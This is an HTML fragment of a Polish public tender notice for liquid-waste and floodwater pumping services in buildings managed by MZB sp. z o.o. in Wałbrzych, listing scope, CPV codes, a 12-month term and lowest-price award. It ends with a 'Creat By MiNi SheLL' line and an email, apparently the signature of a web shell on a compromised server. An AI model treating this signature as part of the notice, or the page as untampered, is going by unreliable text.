<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi wypompowywania nieczystości ciekłych (m.in. fekalii, wód gruntowych lub opadowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi wypompowywania nieczystości ciekłych (m.in. fekalii, wód gruntowych lub opadowych) 1. wypompowywanie nieczystości ciekłych, z zalanych piwnic, korytarzy i innych pomieszczeń oraz ze studzienek w przypadku zaistnienia takiej potrzeby. Przystąpienie do wypompowania nieczystości ciekłych i wód winno nastąpić w ciągu 6 godzin od otrzymania informacji od Zamawiającego w formie pisemnej lub za pomocą poczty elektronicznej. Do przekazywania informacji o potrzebie wykonania usługi uprawnieni są Kierownicy lub upoważnieni pracownicy Biur Obsługi Klienta lub Pogotowia Technicznego Zamawiającego. 2) usługi będą świadczone w budynkach (terenach - w przypadku studzienek) usytuowanych na terenie Wałbrzycha i zarządzanych przez MZB sp. z o.o. 3) transport nieczystości ciekłych do stacji zlewnej w sposób niepowodujący zanieczyszczenia środowiska poprzez przedostawanie się nieczystości ciekłych na zewnątrz, 4) zrzut nieczystości ciekłych do stacji zlewnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.41.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com